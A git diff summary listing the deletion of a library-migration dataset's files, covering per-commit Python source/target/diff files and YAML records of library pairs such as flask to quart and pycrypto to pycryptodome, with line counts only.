...s$c7n_mailer$c7n_mailer$utils.py.source.py | 437 --- ...s$c7n_mailer$c7n_mailer$utils.py.target.py | 437 --- ...ools$c7n_mailer$c7n_mailer$address.py.diff | 90 - ...c7n_mailer$c7n_mailer$address.py.source.py | 88 - ...c7n_mailer$c7n_mailer$address.py.target.py | 89 - ...6__tools$c7n_mailer$c7n_mailer$cli.py.diff | 21 - ...ols$c7n_mailer$c7n_mailer$cli.py.source.py | 142 - ...ols$c7n_mailer$c7n_mailer$cli.py.target.py | 143 - ...tools$c7n_mailer$c7n_mailer$replay.py.diff | 13 - ...$c7n_mailer$c7n_mailer$replay.py.source.py | 125 - ...$c7n_mailer$c7n_mailer$replay.py.target.py | 125 - ..._tools$c7n_mailer$c7n_mailer$utils.py.diff | 46 - ...s$c7n_mailer$c7n_mailer$utils.py.source.py | 272 -- ...s$c7n_mailer$c7n_mailer$utils.py.target.py | 271 -- ...$salad$schema_salad$jsonld_context.py.diff | 180 - ...d$schema_salad$jsonld_context.py.source.py | 162 - ...d$schema_salad$jsonld_context.py.target.py | 177 - ...et__d707ff6__examples$run_eventlet.py.diff | 25 - ...707ff6__examples$run_eventlet.py.source.py | 15 - ...707ff6__examples$run_eventlet.py.target.py | 16 - ..._002f5bd__Python Server$app$server.py.diff | 225 -- ...5bd__Python Server$app$server.py.source.py | 186 - ...5bd__Python Server$app$server.py.target.py | 153 - ...a-asyncio__cdaff15__opcua$uacrypto.py.diff | 161 - ...ncio__cdaff15__opcua$uacrypto.py.source.py | 113 - ...ncio__cdaff15__opcua$uacrypto.py.target.py | 63 - ...simo@myaas__0a65bcc__src$runserver.py.diff | 21 - ...myaas__0a65bcc__src$runserver.py.source.py | 11 - ...myaas__0a65bcc__src$runserver.py.target.py | 15 - ...__e192ca6__sql$utils$aes_decryptor.py.diff | 32 - ...2ca6__sql$utils$aes_decryptor.py.source.py | 44 - ...2ca6__sql$utils$aes_decryptor.py.target.py | 43 - .../holgern@beem__f5ba90e__beem$utils.py.diff | 26 - ...ern@beem__f5ba90e__beem$utils.py.source.py | 387 --- ...ern@beem__f5ba90e__beem$utils.py.target.py | 388 --- ..._components$server$src$routes$auth.py.diff | 95 - ...onents$server$src$routes$auth.py.source.py | 76 - ...onents$server$src$routes$auth.py.target.py | 95 - ...c$base_collectors$source_collector.py.diff | 281 -- ...e_collectors$source_collector.py.source.py | 231 -- ...e_collectors$source_collector.py.target.py | 205 -- ...$src$collector_utilities$functions.py.diff | 67 - ...collector_utilities$functions.py.source.py | 109 - ...collector_utilities$functions.py.target.py | 109 - ...ector$src$collector_utilities$type.py.diff | 23 - ...$src$collector_utilities$type.py.source.py | 18 - ...$src$collector_utilities$type.py.target.py | 19 - ...api_source_collectors$azure_devops.py.diff | 218 -- ...ource_collectors$azure_devops.py.source.py | 210 -- ...ource_collectors$azure_devops.py.target.py | 211 -- ...b-issue-classification$python$rest.py.diff | 72 - ...ue-classification$python$rest.py.source.py | 55 - ...ue-classification$python$rest.py.target.py | 62 - ...nagement_api$tenants$tenants_utils.py.diff | 32 - ...ent_api$tenants$tenants_utils.py.source.py | 256 -- ...ent_api$tenants$tenants_utils.py.target.py | 255 -- ...l-manager__71aff3a__tests$conftest.py.diff | 22 - ...ager__71aff3a__tests$conftest.py.source.py | 199 -- ...ager__71aff3a__tests$conftest.py.target.py | 199 -- ...tests$management_api_tests$context.py.diff | 37 - ...$management_api_tests$context.py.source.py | 120 - ...$management_api_tests$context.py.target.py | 120 - ...api_tests$endpoints$endpoint_utils.py.diff | 21 - ...ests$endpoints$endpoint_utils.py.source.py | 122 - ...ests$endpoints$endpoint_utils.py.target.py | 122 - ...__047263b__mycodo$mycodo_flask$api.py.diff | 60 - ...263b__mycodo$mycodo_flask$api.py.source.py | 39 - ...263b__mycodo$mycodo_flask$api.py.target.py | 46 - ...__mycodo$mycodo_flask$api$__init__.py.diff | 13 - ...odo$mycodo_flask$api$__init__.py.source.py | 71 - ...odo$mycodo_flask$api$__init__.py.target.py | 71 - ...3__mycodo$mycodo_flask$api$choices.py.diff | 17 - ...codo$mycodo_flask$api$choices.py.source.py | 228 -- ...codo$mycodo_flask$api$choices.py.target.py | 228 -- ...mycodo$mycodo_flask$api$controller.py.diff | 17 - ...o$mycodo_flask$api$controller.py.source.py | 80 - ...o$mycodo_flask$api$controller.py.target.py | 80 - ...73__mycodo$mycodo_flask$api$daemon.py.diff | 17 - ...ycodo$mycodo_flask$api$daemon.py.source.py | 84 - ...ycodo$mycodo_flask$api$daemon.py.target.py | 84 - ...173__mycodo$mycodo_flask$api$input.py.diff | 17 - ...mycodo$mycodo_flask$api$input.py.source.py | 120 - ...mycodo$mycodo_flask$api$input.py.target.py | 120 - ...9173__mycodo$mycodo_flask$api$math.py.diff | 17 - ..._mycodo$mycodo_flask$api$math.py.source.py | 90 - ..._mycodo$mycodo_flask$api$math.py.target.py | 90 - ...ycodo$mycodo_flask$api$measurement.py.diff | 17 - ...$mycodo_flask$api$measurement.py.source.py | 313 -- ...$mycodo_flask$api$measurement.py.target.py | 313 -- ...73__mycodo$mycodo_flask$api$output.py.diff | 17 - ...ycodo$mycodo_flask$api$output.py.source.py | 194 -- ...ycodo$mycodo_flask$api$output.py.target.py | 194 -- ...69173__mycodo$mycodo_flask$api$pid.py.diff | 17 - ...__mycodo$mycodo_flask$api$pid.py.source.py | 90 - ...__mycodo$mycodo_flask$api$pid.py.target.py | 90 - ...__mycodo$mycodo_flask$api$settings.py.diff | 17 - ...odo$mycodo_flask$api$settings.py.source.py | 557 --- ...odo$mycodo_flask$api$settings.py.target.py | 557 --- ...mycodo_flask$api$sql_schema_fields.py.diff | 11 - ...o_flask$api$sql_schema_fields.py.source.py | 243 -- ...o_flask$api$sql_schema_fields.py.target.py | 243 -- ..._547f6d9__mycodo$controller_sensor.py.diff | 306 -- ...6d9__mycodo$controller_sensor.py.source.py | 974 ------ ...6d9__mycodo$controller_sensor.py.target.py | 945 ----- ...ycodo$devices$atlas_scientific_i2c.py.diff | 95 - ...$devices$atlas_scientific_i2c.py.source.py | 192 - ...$devices$atlas_scientific_i2c.py.target.py | 194 -- ...codo$devices$atlas_scientific_uart.py.diff | 126 - ...devices$atlas_scientific_uart.py.source.py | 138 - ...devices$atlas_scientific_uart.py.target.py | 142 - ...ycodo__547f6d9__mycodo$sensors$k30.py.diff | 60 - ...__547f6d9__mycodo$sensors$k30.py.source.py | 121 - ...__547f6d9__mycodo$sensors$k30.py.target.py | 120 - ...do__547f6d9__mycodo$sensors$mh_z16.py.diff | 77 - ...47f6d9__mycodo$sensors$mh_z16.py.source.py | 240 -- ...47f6d9__mycodo$sensors$mh_z16.py.target.py | 238 -- ...do__547f6d9__mycodo$sensors$mh_z19.py.diff | 75 - ...47f6d9__mycodo$sensors$mh_z19.py.source.py | 121 - ...47f6d9__mycodo$sensors$mh_z19.py.target.py | 123 - ...roservices$projection_image$server.py.diff | 37 - ...vices$projection_image$server.py.source.py | 127 - ...vices$projection_image$server.py.target.py | 127 - ...udgeshu__b687d20__submission$tasks.py.diff | 21 - ...hu__b687d20__submission$tasks.py.source.py | 9 - ...hu__b687d20__submission$tasks.py.target.py | 9 - ...@byob__9291b54__byob$core$security.py.diff | 56 - ...__9291b54__byob$core$security.py.source.py | 157 - ...__9291b54__byob$core$security.py.target.py | 157 - ...byob__9291b54__byob$modules$ransom.py.diff | 65 - ..._9291b54__byob$modules$ransom.py.source.py | 239 -- ..._9291b54__byob$modules$ransom.py.target.py | 239 -- ...955ac9__nni$experiment$config$base.py.diff | 22 - ...9__nni$experiment$config$base.py.source.py | 153 - ...9__nni$experiment$config$base.py.target.py | 153 - ...5ac9__nni$experiment$config$common.py.diff | 22 - ..._nni$experiment$config$common.py.source.py | 189 - ..._nni$experiment$config$common.py.target.py | 189 - ...ac9__nni$tools$nnictl$common_utils.py.diff | 22 - ...nni$tools$nnictl$common_utils.py.source.py | 125 - ...nni$tools$nnictl$common_utils.py.target.py | 125 - ...__nni$tools$package_utils$__init__.py.diff | 28 - ...$tools$package_utils$__init__.py.source.py | 229 -- ...$tools$package_utils$__init__.py.target.py | 229 -- ...9__test$nni_test$nnitest$run_tests.py.diff | 22 - ...st$nni_test$nnitest$run_tests.py.source.py | 293 -- ...st$nni_test$nnitest$run_tests.py.target.py | 293 -- ...55ac9__test$nni_test$nnitest$utils.py.diff | 28 - ...__test$nni_test$nnitest$utils.py.source.py | 181 - ...__test$nni_test$nnitest$utils.py.target.py | 181 - ...chmark_test$scripts$milvus_helpers.py.diff | 87 - ...k_test$scripts$milvus_helpers.py.source.py | 156 - ...k_test$scripts$milvus_helpers.py.target.py | 165 - ...k_deploy$server$src$milvus_helpers.py.diff | 57 - ...loy$server$src$milvus_helpers.py.source.py | 119 - ...loy$server$src$milvus_helpers.py.target.py | 119 - ...etection$server$src$milvus_helpers.py.diff | 16 - ...ion$server$src$milvus_helpers.py.source.py | 119 - ...ion$server$src$milvus_helpers.py.target.py | 115 - ...k_deploy$server$src$milvus_helpers.py.diff | 16 - ...loy$server$src$milvus_helpers.py.source.py | 121 - ...loy$server$src$milvus_helpers.py.target.py | 117 - ...5d2__qary$skills$search_fuzzy_bots.py.diff | 22 - ...qary$skills$search_fuzzy_bots.py.source.py | 117 - ...qary$skills$search_fuzzy_bots.py.target.py | 117 - ...plugins__2c40713__WorldTime$plugin.py.diff | 46 - ...ns__2c40713__WorldTime$plugin.py.source.py | 217 -- ...ns__2c40713__WorldTime$plugin.py.target.py | 212 -- ...noria-plugins__33c7a3f__NBA$plugin.py.diff | 116 - ...-plugins__33c7a3f__NBA$plugin.py.source.py | 829 ----- ...-plugins__33c7a3f__NBA$plugin.py.target.py | 831 ----- ...noria-plugins__33c7a3f__NHL$plugin.py.diff | 161 - ...-plugins__33c7a3f__NHL$plugin.py.source.py | 760 ---- ...-plugins__33c7a3f__NHL$plugin.py.target.py | 746 ---- ..._4377d67__web-app$qfieldcloud$urls.py.diff | 49 - ...d67__web-app$qfieldcloud$urls.py.source.py | 27 - ...d67__web-app$qfieldcloud$urls.py.target.py | 54 - ...oslo_messaging$_drivers$impl_kafka.py.diff | 400 --- ...messaging$_drivers$impl_kafka.py.source.py | 425 --- ...messaging$_drivers$impl_kafka.py.target.py | 456 --- ...$orchest-api$app$app$apis$__init__.py.diff | 11 - ...est-api$app$app$apis$__init__.py.source.py | 29 - ...est-api$app$app$apis$__init__.py.target.py | 29 - ...$apis$namespace_environment_builds.py.diff | 13 - ...$namespace_environment_builds.py.source.py | 342 -- ...$namespace_environment_builds.py.target.py | 342 -- ...$apis$namespace_environment_images.py.diff | 13 - ...$namespace_environment_images.py.source.py | 177 - ...$namespace_environment_images.py.target.py | 177 - ...app$app$apis$namespace_experiments.py.diff | 33 - ...pp$apis$namespace_experiments.py.source.py | 438 --- ...pp$apis$namespace_experiments.py.target.py | 440 --- ...i$app$app$apis$namespace_pipelines.py.diff | 16 - ...$app$apis$namespace_pipelines.py.source.py | 62 - ...$app$apis$namespace_pipelines.py.target.py | 62 - ...pi$app$app$apis$namespace_projects.py.diff | 16 - ...p$app$apis$namespace_projects.py.source.py | 89 - ...p$app$apis$namespace_projects.py.target.py | 89 - ...st-api$app$app$apis$namespace_runs.py.diff | 13 - ...i$app$app$apis$namespace_runs.py.source.py | 259 -- ...i$app$app$apis$namespace_runs.py.target.py | 259 -- ...pi$app$app$apis$namespace_sessions.py.diff | 13 - ...p$app$apis$namespace_sessions.py.source.py | 179 - ...p$app$apis$namespace_sessions.py.target.py | 179 - ...app$app$apis$namespace_validations.py.diff | 13 - ...pp$apis$namespace_validations.py.source.py | 103 - ...pp$apis$namespace_validations.py.target.py | 103 - ...ervices$orchest-api$app$app$schema.py.diff | 13 - ...es$orchest-api$app$app$schema.py.source.py | 383 -- ...es$orchest-api$app$app$schema.py.target.py | 383 -- ...services$orchest-api$app$app$utils.py.diff | 13 - ...ces$orchest-api$app$app$utils.py.source.py | 394 --- ...ces$orchest-api$app$app$utils.py.target.py | 394 --- ..._flask_article__0a70f2b__app$films.py.diff | 57 - ...k_article__0a70f2b__app$films.py.source.py | 44 - ...k_article__0a70f2b__app$films.py.target.py | 42 - ...lask_article__0a70f2b__app$reviews.py.diff | 34 - ...article__0a70f2b__app$reviews.py.source.py | 21 - ...article__0a70f2b__app$reviews.py.target.py | 20 - ...an_flask_article__0a70f2b__app$run.py.diff | 55 - ...ask_article__0a70f2b__app$run.py.source.py | 50 - ...ask_article__0a70f2b__app$run.py.target.py | 27 - ...orter$lambda$cross_region_importer.py.diff | 60 - ...$lambda$cross_region_importer.py.source.py | 221 -- ...$lambda$cross_region_importer.py.target.py | 209 -- ...da$cross_region_import_replication.py.diff | 210 -- ...oss_region_import_replication.py.source.py | 162 - ...oss_region_import_replication.py.target.py | 126 - ...rator__598f275__src$api$IocManager.py.diff | 13 - ...__598f275__src$api$IocManager.py.source.py | 143 - ...__598f275__src$api$IocManager.py.target.py | 143 - ...rollers$common$models$CommonModels.py.diff | 55 - ...rs$common$models$CommonModels.py.source.py | 40 - ...rs$common$models$CommonModels.py.target.py | 66 - ...connection$models$ConnectionModels.py.diff | 13 - ...ction$models$ConnectionModels.py.source.py | 357 -- ...ction$models$ConnectionModels.py.target.py | 357 -- ...ation$models$DataIntegrationModels.py.diff | 13 - ...$models$DataIntegrationModels.py.source.py | 289 -- ...$models$DataIntegrationModels.py.target.py | 289 -- ...i$controllers$job$models$JobModels.py.diff | 13 - ...trollers$job$models$JobModels.py.source.py | 79 - ...trollers$job$models$JobModels.py.target.py | 79 - ...eration$models$DataOperationModels.py.diff | 13 - ...on$models$DataOperationModels.py.source.py | 165 - ...on$models$DataOperationModels.py.target.py | 165 - ...peration$models$JobSchedulerModels.py.diff | 13 - ...ion$models$JobSchedulerModels.py.source.py | 91 - ...ion$models$JobSchedulerModels.py.target.py | 91 - ...api$infrastructor$api$ResourceBase.py.diff | 10 - ...nfrastructor$api$ResourceBase.py.source.py | 5 - ...nfrastructor$api$ResourceBase.py.target.py | 5 - ...lingo__1d8923a__musicbot$linkutils.py.diff | 89 - ...__1d8923a__musicbot$linkutils.py.source.py | 192 - ...__1d8923a__musicbot$linkutils.py.target.py | 197 -- ...vatory$dashboard$models$Screenshot.py.diff | 13 - ...y$dashboard$models$Screenshot.py.source.py | 118 - ...y$dashboard$models$Screenshot.py.target.py | 118 - ...ap@rocketmap__2960ec6__pogom$utils.py.diff | 170 - ...cketmap__2960ec6__pogom$utils.py.source.py | 194 -- ...cketmap__2960ec6__pogom$utils.py.target.py | 141 - ...eye__a7375cc__pyfront$app$__init__.py.diff | 38 - ...a7375cc__pyfront$app$__init__.py.source.py | 17 - ...a7375cc__pyfront$app$__init__.py.target.py | 23 - ...shoebot__0171fb9__shoebot$data$img.py.diff | 13 - ...ot__0171fb9__shoebot$data$img.py.source.py | 138 - ...ot__0171fb9__shoebot$data$img.py.target.py | 138 - ...813214e__example$blueprint$example.py.diff | 38 - ...4e__example$blueprint$example.py.source.py | 55 - ...4e__example$blueprint$example.py.target.py | 55 - ..._813214e__example$current_app$main.py.diff | 18 - ...14e__example$current_app$main.py.source.py | 49 - ...14e__example$current_app$main.py.target.py | 42 - ...ents-api__813214e__example$example.py.diff | 28 - ...api__813214e__example$example.py.source.py | 40 - ...api__813214e__example$example.py.target.py | 50 - ...example$working_with_proxy$example.py.diff | 39 - ...le$working_with_proxy$example.py.source.py | 65 - ...le$working_with_proxy$example.py.target.py | 66 - ...2a__tutorial$PythOnBoardingBot$app.py.diff | 13 - ...utorial$PythOnBoardingBot$app.py.source.py | 147 - ...utorial$PythOnBoardingBot$app.py.target.py | 147 - ...torial$PythOnBoardingBot$async_app.py.diff | 68 - ...l$PythOnBoardingBot$async_app.py.source.py | 149 - ...l$PythOnBoardingBot$async_app.py.target.py | 150 - ...ickbot$trickbot_artifact_decrypter.py.diff | 43 - ...t$trickbot_artifact_decrypter.py.source.py | 286 -- ...t$trickbot_artifact_decrypter.py.target.py | 289 -- ...l@rtkbase__a4c347a__web_app$server.py.diff | 19 - ...base__a4c347a__web_app$server.py.source.py | 463 --- ...base__a4c347a__web_app$server.py.target.py | 463 --- ...l@rtkbase__cf856c0__web_app$server.py.diff | 55 - ...base__cf856c0__web_app$server.py.source.py | 471 --- ...base__cf856c0__web_app$server.py.target.py | 473 --- ...esiam@voice2json__7ea7ddb__web$app.py.diff | 225 -- ...@voice2json__7ea7ddb__web$app.py.source.py | 480 --- ...@voice2json__7ea7ddb__web$app.py.target.py | 489 --- ...query$gcloud$aio$bigquery$bigquery.py.diff | 83 - ...$gcloud$aio$bigquery$bigquery.py.source.py | 135 - ...$gcloud$aio$bigquery$bigquery.py.target.py | 126 - ...ore$gcloud$aio$datastore$datastore.py.diff | 83 - ...cloud$aio$datastore$datastore.py.source.py | 176 - ...cloud$aio$datastore$datastore.py.target.py | 189 - ...eue$gcloud$aio$taskqueue$taskqueue.py.diff | 502 --- ...cloud$aio$taskqueue$taskqueue.py.source.py | 376 -- ...cloud$aio$taskqueue$taskqueue.py.target.py | 149 - ...cape_api$services$location_service.py.diff | 38 - ...api$services$location_service.py.source.py | 27 - ...api$services$location_service.py.target.py | 29 - ...cityscape_api$services$sun_service.py.diff | 36 - ...cape_api$services$sun_service.py.source.py | 39 - ...cape_api$services$sun_service.py.target.py | 41 - ...scape_api$services$weather_service.py.diff | 25 - ..._api$services$weather_service.py.source.py | 16 - ..._api$services$weather_service.py.target.py | 17 - ...rc$10-async-web$acityscape_api$app.py.diff | 19 - ...-async-web$acityscape_api$app.py.source.py | 34 - ...-async-web$acityscape_api$app.py.target.py | 34 - ...-web$acityscape_api$views$city_api.py.diff | 32 - ...acityscape_api$views$city_api.py.source.py | 21 - ...acityscape_api$views$city_api.py.target.py | 21 - ...sync-web$acityscape_api$views$home.py.diff | 19 - ...web$acityscape_api$views$home.py.source.py | 15 - ...web$acityscape_api$views$home.py.target.py | 15 - ...$web_scraping$async_scrape$program.py.diff | 63 - ...scraping$async_scrape$program.py.source.py | 40 - ...scraping$async_scrape$program.py.target.py | 58 - ...0__services$users$project$api$ping.py.diff | 25 - ...rvices$users$project$api$ping.py.source.py | 16 - ...rvices$users$project$api$ping.py.target.py | 14 - ...ices$users$project$api$users$views.py.diff | 190 - ...users$project$api$users$views.py.source.py | 113 - ...users$project$api$users$views.py.target.py | 97 - ...ve__b86b375__web$app$notifications.py.diff | 78 - ...86b375__web$app$notifications.py.source.py | 427 --- ...86b375__web$app$notifications.py.target.py | 427 --- ...e__936761f__datetimerange$__init__.py.diff | 73 - ...6761f__datetimerange$__init__.py.source.py | 737 ---- ...6761f__datetimerange$__init__.py.target.py | 751 ---- ..._45fac3c__pingparsing$_pingparsing.py.diff | 57 - ...c3c__pingparsing$_pingparsing.py.source.py | 261 -- ...c3c__pingparsing$_pingparsing.py.target.py | 262 -- ...ac3c__pingparsing$_pingtransmitter.py.diff | 80 - ..._pingparsing$_pingtransmitter.py.source.py | 161 - ..._pingparsing$_pingtransmitter.py.target.py | 166 - ...__26c8e74__sqlitebiter$sqlitebiter.py.diff | 53 - ...8e74__sqlitebiter$sqlitebiter.py.source.py | 341 -- ...8e74__sqlitebiter$sqlitebiter.py.target.py | 341 -- ...__311c7ce__sqlitebiter$sqlitebiter.py.diff | 142 - ...c7ce__sqlitebiter$sqlitebiter.py.source.py | 500 --- ...c7ce__sqlitebiter$sqlitebiter.py.target.py | 485 --- ...cconfig__7ba8676__tcconfig$_logger.py.diff | 88 - ...ig__7ba8676__tcconfig$_logger.py.source.py | 64 - ...ig__7ba8676__tcconfig$_logger.py.target.py | 46 - ...auto-split__86244b6__src$AutoSplit.py.diff | 149 - ...split__86244b6__src$AutoSplit.py.source.py | 972 ------ ...split__86244b6__src$AutoSplit.py.target.py | 965 ----- ...ool@auto-split__86244b6__src$about.py.diff | 58 - ...uto-split__86244b6__src$about.py.source.py | 78 - ...uto-split__86244b6__src$about.py.target.py | 79 - ...ol@auto-split__86244b6__src$design.py.diff | 306 -- ...to-split__86244b6__src$design.py.source.py | 561 --- ...to-split__86244b6__src$design.py.target.py | 563 --- ...split__86244b6__src$error_messages.py.diff | 184 - ...__86244b6__src$error_messages.py.source.py | 142 - ...__86244b6__src$error_messages.py.target.py | 93 - ...@auto-split__86244b6__src$menu_bar.py.diff | 11 - ...-split__86244b6__src$menu_bar.py.source.py | 20 - ...-split__86244b6__src$menu_bar.py.target.py | 20 - ...o-split__86244b6__src$resources_rc.py.diff | 21 - ...it__86244b6__src$resources_rc.py.source.py | 3092 ----------------- ...it__86244b6__src$resources_rc.py.target.py | 3089 ---------------- ...-split__86244b6__src$screen_region.py.diff | 130 - ...t__86244b6__src$screen_region.py.source.py | 289 -- ...t__86244b6__src$screen_region.py.target.py | 292 -- ...-split__86244b6__src$settings_file.py.diff | 11 - ...t__86244b6__src$settings_file.py.source.py | 267 -- ...t__86244b6__src$settings_file.py.target.py | 267 -- ...uber-server$src$openvtuber$web$web.py.diff | 30 - ...server$src$openvtuber$web$web.py.source.py | 17 - ...server$src$openvtuber$web$web.py.target.py | 16 - ...syl@weasyl__d10cb16__weasyl$define.py.diff | 52 - ...easyl__d10cb16__weasyl$define.py.source.py | 1087 ------ ...easyl__d10cb16__weasyl$define.py.target.py | 1078 ------ ...weasyl__d10cb16__weasyl$middleware.py.diff | 203 -- ...l__d10cb16__weasyl$middleware.py.source.py | 505 --- ...l__d10cb16__weasyl$middleware.py.target.py | 415 --- ...asyl@weasyl__f6230c7__weasyl$login.py.diff | 33 - ...weasyl__f6230c7__weasyl$login.py.source.py | 304 -- ...weasyl__f6230c7__weasyl$login.py.target.py | 305 -- ...p-ui__8ef3b62__burpui$api$__init__.py.diff | 13 - ..._8ef3b62__burpui$api$__init__.py.source.py | 43 - ..._8ef3b62__burpui$api$__init__.py.target.py | 43 - ...urp-ui__8ef3b62__burpui$api$client.py.diff | 13 - ...i__8ef3b62__burpui$api$client.py.source.py | 358 -- ...i__8ef3b62__burpui$api$client.py.target.py | 358 -- ...rp-ui__8ef3b62__burpui$api$clients.py.diff | 13 - ...__8ef3b62__burpui$api$clients.py.source.py | 314 -- ...__8ef3b62__burpui$api$clients.py.target.py | 314 -- ...@burp-ui__8ef3b62__burpui$api$misc.py.diff | 13 - ...-ui__8ef3b62__burpui$api$misc.py.source.py | 84 - ...-ui__8ef3b62__burpui$api$misc.py.target.py | 84 - ...rp-ui__8ef3b62__burpui$api$restore.py.diff | 13 - ...__8ef3b62__burpui$api$restore.py.source.py | 255 -- ...__8ef3b62__burpui$api$restore.py.target.py | 255 -- ...rp-ui__8ef3b62__burpui$api$servers.py.diff | 13 - ...__8ef3b62__burpui$api$servers.py.source.py | 97 - ...__8ef3b62__burpui$api$servers.py.target.py | 97 - ...p-ui__8ef3b62__burpui$api$settings.py.diff | 13 - ..._8ef3b62__burpui$api$settings.py.source.py | 311 -- ..._8ef3b62__burpui$api$settings.py.target.py | 311 -- ...ns$bridge_with_slack$run-slack-bridge.diff | 36 - ...idge_with_slack$run-slack-bridge.source.py | 136 - ...idge_with_slack$run-slack-bridge.target.py | 137 - v1/data/libpair/appdirs,platformdirs.yaml | 4 - v1/data/libpair/argparse,configargparse.yaml | 4 - v1/data/libpair/attr,attrs.yaml | 4 - v1/data/libpair/celery,rq.yaml | 4 - v1/data/libpair/cheetah,cheetah3.yaml | 4 - v1/data/libpair/dataproperty,typepy.yaml | 4 - ...egistration,django-registration-redux.yaml | 4 - .../libpair/django-rest-swagger,drf-yasg.yaml | 4 - v1/data/libpair/dotenv,python-dotenv.yaml | 4 - v1/data/libpair/eventlet,gevent.yaml | 4 - v1/data/libpair/flask,fastapi.yaml | 4 - v1/data/libpair/flask,quart.yaml | 4 - v1/data/libpair/flask,uvicorn.yaml | 4 - .../libpair/flask-restful,flask-restplus.yaml | 4 - .../libpair/flask-restplus,flask-restx.yaml | 4 - .../flask-security,flask-security-too.yaml | 4 - v1/data/libpair/fuzzywuzzy,rapidfuzz.yaml | 4 - v1/data/libpair/gcloud-aio-core,aiohttp.yaml | 4 - v1/data/libpair/gevent,eventlet.yaml | 4 - v1/data/libpair/gunicorn,waitress.yaml | 4 - v1/data/libpair/huey,celery.yaml | 4 - v1/data/libpair/jwt,pyjwt.yaml | 4 - .../libpair/kafka-python,confluent-kafka.yaml | 4 - v1/data/libpair/keras,torch.yaml | 4 - v1/data/libpair/lockfile,fasteners.yaml | 4 - v1/data/libpair/logbook,loguru.yaml | 4 - v1/data/libpair/magic,python-magic.yaml | 4 - v1/data/libpair/mysql-python,mysqlclient.yaml | 4 - v1/data/libpair/mysql-python,pymysql.yaml | 4 - v1/data/libpair/mysqlclient,psycopg2.yaml | 4 - v1/data/libpair/openpyxl,xlsxwriter.yaml | 4 - v1/data/libpair/pandas,numpy.yaml | 4 - v1/data/libpair/pil,pillow.yaml | 4 - v1/data/libpair/pillow,torchvision.yaml | 4 - v1/data/libpair/py-bcrypt,bcrypt.yaml | 4 - v1/data/libpair/pycrypto,cryptography.yaml | 4 - v1/data/libpair/pycrypto,pycryptodome.yaml | 4 - .../libpair/pycryptodome,pycryptodomex.yaml | 4 - v1/data/libpair/pymilvus-orm,pymilvus.yaml | 4 - v1/data/libpair/pyqt5,pyside6.yaml | 4 - v1/data/libpair/python-ldap,ldap3.yaml | 4 - ...on-social-auth,social-auth-app-django.yaml | 4 - v1/data/libpair/pytz,pendulum.yaml | 4 - v1/data/libpair/pyyaml,ruamel.yaml.yaml | 4 - v1/data/libpair/raven,sentry-sdk.yaml | 4 - v1/data/libpair/requests,aiohttp.yaml | 4 - v1/data/libpair/retrying,tenacity.yaml | 4 - v1/data/libpair/ruamel.yaml,pyyaml.yaml | 4 - v1/data/libpair/s3cmd,awscli.yaml | 4 - v1/data/libpair/scapy-python3,scapy.yaml | 4 - v1/data/libpair/sklearn,torch.yaml | 4 - v1/data/libpair/slackclient,slack-sdk.yaml | 4 - v1/data/libpair/slugify,python-slugify.yaml | 4 - v1/data/libpair/tensorboard,tensorboardx.yaml | 4 - v1/data/libpair/urllib,urllib3.yaml | 4 - v1/data/libpair/uwsgi,gunicorn.yaml | 4 - v1/data/libpair/websocket-client,tornado.yaml | 4 - v1/data/libpair/xlrd,openpyxl.yaml | 4 - v1/data/libpair/xlsxwriter,openpyxl.yaml | 4 - v1/data/migration/002f5bd_flask,quart.yaml | 17 - v1/data/migration/0171fb9_pil,pillow.yaml | 16 - .../02b064b_pycryptodome,pycryptodomex.yaml | 13 - v1/data/migration/03a9621_s3cmd,awscli.yaml | 12 - .../migration/0411d6a_raven,sentry-sdk.yaml | 20 - .../047263b_flask-restful,flask-restplus.yaml | 12 - v1/data/migration/04a5913_pil,pillow.yaml | 14 - .../054d5d2_fuzzywuzzy,rapidfuzz.yaml | 18 - .../migration/08e7ffa_gunicorn,waitress.yaml | 9 - .../0911992_pycrypto,pycryptodome.yaml | 10 - .../migration/0a65bcc_raven,sentry-sdk.yaml | 12 - v1/data/migration/0a70f2b_flask,quart.yaml | 20 - .../migration/0d78d19_lockfile,fasteners.yaml | 27 - v1/data/migration/0df86b5_logbook,loguru.yaml | 9 - .../migration/12e3e80_ruamel.yaml,pyyaml.yaml | 18 - .../14388c3_pycrypto,pycryptodome.yaml | 16 - ...on-social-auth,social-auth-app-django.yaml | 12 - .../19dde42_pycryptodome,pycryptodomex.yaml | 24 - .../migration/1c574c1_requests,aiohttp.yaml | 9 - .../migration/1d8923a_requests,aiohttp.yaml | 14 - v1/data/migration/22cc3f0_flask,quart.yaml | 16 - v1/data/migration/24a848d_flask,fastapi.yaml | 12 - v1/data/migration/24a848d_flask,uvicorn.yaml | 9 - .../26c8e74_dataproperty,typepy.yaml | 16 - .../migration/27e2a46_pillow,torchvision.yaml | 9 - .../2960ec6_argparse,configargparse.yaml | 24 - v1/data/migration/2adc6a9_xlrd,openpyxl.yaml | 9 - v1/data/migration/2c40713_pytz,pendulum.yaml | 12 - .../2d9cf64_slackclient,slack-sdk.yaml | 15 - v1/data/migration/2fc0f26_pil,pillow.yaml | 9 - v1/data/migration/311c7ce_logbook,loguru.yaml | 13 - v1/data/migration/31212eb_pil,pillow.yaml | 9 - v1/data/migration/33c7a3f_pytz,pendulum.yaml | 15 - .../migration/356ce56_raven,sentry-sdk.yaml | 9 - .../35ae8f3_mysql-python,mysqlclient.yaml | 10 - v1/data/migration/35d8144_urllib,urllib3.yaml | 9 - v1/data/migration/3abbc43_flask,fastapi.yaml | 13 - v1/data/migration/3abbc43_flask,uvicorn.yaml | 13 - v1/data/migration/3f786f4_uwsgi,gunicorn.yaml | 9 - v1/data/migration/432afa4_jwt,pyjwt.yaml | 9 - .../4377d67_django-rest-swagger,drf-yasg.yaml | 15 - v1/data/migration/43e8ec2_celery,rq.yaml | 9 - .../45d94dd_gcloud-aio-core,aiohttp.yaml | 13 - .../45fac3c_dataproperty,typepy.yaml | 26 - .../472f336_xlsxwriter,openpyxl.yaml | 13 - .../49cf693_pycrypto,pycryptodome.yaml | 11 - .../migration/4ad53b5_py-bcrypt,bcrypt.yaml | 41 - v1/data/migration/4c3400a_pil,pillow.yaml | 11 - v1/data/migration/4fc081b_keras,torch.yaml | 10 - .../50b7bae_mysqlclient,psycopg2.yaml | 14 - .../5169173_flask-restplus,flask-restx.yaml | 42 - .../migration/51f2688_gevent,eventlet.yaml | 15 - v1/data/migration/528b986_jwt,pyjwt.yaml | 9 - v1/data/migration/5393290_pil,pillow.yaml | 10 - .../migration/53f2073_requests,aiohttp.yaml | 9 - .../migration/547f6d9_lockfile,fasteners.yaml | 37 - .../migration/56e3253_python-ldap,ldap3.yaml | 9 - .../57d12c4_openpyxl,xlsxwriter.yaml | 12 - .../58237dc_mysql-python,pymysql.yaml | 9 - 